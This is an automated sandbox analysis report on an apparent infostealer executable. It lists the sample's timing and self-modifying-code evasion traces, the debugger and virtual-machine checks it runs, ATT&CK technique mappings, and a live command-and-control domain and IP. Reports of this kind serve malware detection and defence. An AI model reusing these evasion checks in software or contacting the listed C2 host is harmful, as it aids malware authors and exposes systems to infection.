Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DCA second address: 76C0DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DE1 second address: 76C0DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DE5 second address: 76C0DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77109FB second address: 77109FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77109FF second address: 7710A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7710A05 second address: 7710A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7710A0B second address: 7710A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F005E second address: 76F00CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F9334BA0038h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ax, C4D3h 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 call 00007F9334BA0035h 0x0000001e jmp 00007F9334BA0030h 0x00000023 pop ecx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F9334BA0033h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F00CA second address: 76F00CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F00CE second address: 76F00D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F00D4 second address: 76F0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F9334DAF99Dh 0x00000014 and si, B406h 0x00000019 jmp 00007F9334DAF9A1h 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov dh, 17h 0x00000022 popad 0x00000023 sub esp, 44h 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F9334DAF9A5h 0x0000002d jmp 00007F9334DAF99Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F9334DAF99Bh 0x0000003e sub eax, 58BAF89Eh 0x00000044 jmp 00007F9334DAF9A9h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F0172 second address: 76F0189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0033h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F0189 second address: 76F01B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9334DAF99Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01B7 second address: 76F01BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01BD second address: 76F01E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F9334DAF9A9h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01E6 second address: 76F01EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01EC second address: 76F01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01F2 second address: 76F01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F01F6 second address: 76F020C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ch, bl 0x0000000c movzx ecx, di 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov esi, edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F020C second address: 76F0270 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9334BA0035h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F9334BA0031h 0x00000010 adc ah, FFFFFFB6h 0x00000013 jmp 00007F9334BA0031h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b jmp 00007F9334BA002Eh 0x00000020 push eax 0x00000021 jmp 00007F9334BA002Bh 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F0270 second address: 76F028B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F028B second address: 76F02BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9334BA002Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76F02BA second address: 76F0333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 pushad 0x00000012 mov cx, 82D3h 0x00000016 mov eax, 7989792Fh 0x0000001b popad 0x0000001c lock bts dword ptr [edi], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F9334DAF9A7h 0x0000002a sbb ax, B86Eh 0x0000002f jmp 00007F9334DAF9A9h 0x00000034 popfd 0x00000035 call 00007F9334DAF9A0h 0x0000003a pop eax 0x0000003b popad 0x0000003c rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 16BB954 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 185EA33 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 1874674 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeSpecial instruction interceptor: First address: 18EEAB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\CMpuGis28l.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D005B5 sldt word ptr [eax+00000000h]0_3_01D005B5
Source: C:\Users\user\Desktop\CMpuGis28l.exe TID: 7016Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F7255D
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F729FF
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_2_00F7255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F7255D
Source: CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: CMpuGis28l.exeBinary or memory string: Hyper-V RAW
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: CMpuGis28l.exe, 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000003.2522407945.0000000001CFE000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000003.2522667197.0000000001D0D000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000003.2522167712.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000002.2532514367.0000000001D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: CMpuGis28l.exe, 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CMpuGis28l.exe, 00000000.00000003.2476420901.0000000001CA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\CMpuGis28l.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\CMpuGis28l.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: NTICE
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: SICE
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeProcess queried: DebugPortJump to behavior
Source: CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\CMpuGis28l.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.12:49711 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		25
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory25
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CMpuGis28l.exe37%ReversingLabsWin32.Infostealer.Tinba
CMpuGis28l.exe100%AviraTR/Crypt.TPM.Gen
CMpuGis28l.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851true
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlCMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdCMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851S~CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpCMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpfalse
                  		unknown
                  https://httpbin.org/ipbeforeCMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlCMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://curl.se/docs/hsts.html#CMpuGis28l.exefalse
                          		high
                          http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            https://curl.se/docs/alt-svc.htmlCMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://.cssCMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.jpgCMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.121.15.192
                                  		home.fivetk5ht.topSpain
                                  		207046REDSERVICIOESfalse
                                  98.85.100.80
                                  		httpbin.orgUnited States
                                  		11351TWC-11351-NORTHEASTUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578895
                                  Start date and time:2024-12-20 16:19:00 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 10s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:CMpuGis28l.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:b6aa4b3886f2272b307df8dee7426a4f.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.63
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: CMpuGis28l.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  10:20:14API Interceptor3x Sleep call for process: CMpuGis28l.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.121.15.1925Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
                                  98.85.100.80u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                    TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                  SwJD3kiOwV.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    8dw8GAvqmM.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      home.fivetk5ht.topfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      • 185.121.15.192
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      • 185.121.15.192
                                                      httpbin.org5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 98.85.100.80
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      • 34.226.108.155
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      • 98.85.100.80
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      • 34.226.108.155
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                      • 98.85.100.80
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                      • 34.226.108.155
                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                      • 34.226.108.155
                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                      • 98.85.100.80

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TWC-11351-NORTHEASTUSu57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 98.85.100.80
                                                      arm5.elfGet hashmaliciousMiraiBrowse
                                                      • 72.226.210.219
                                                      hmips.elfGet hashmaliciousMiraiBrowse
                                                      • 45.46.119.24
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      • 98.85.100.80
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                      • 98.85.100.80
                                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                      • 67.252.15.48
                                                      la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                      • 98.94.131.188
                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                      • 98.85.100.80
                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 50.75.56.140
                                                      REDSERVICIOES5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192
                                                      u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192
                                                      TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 185.121.15.192
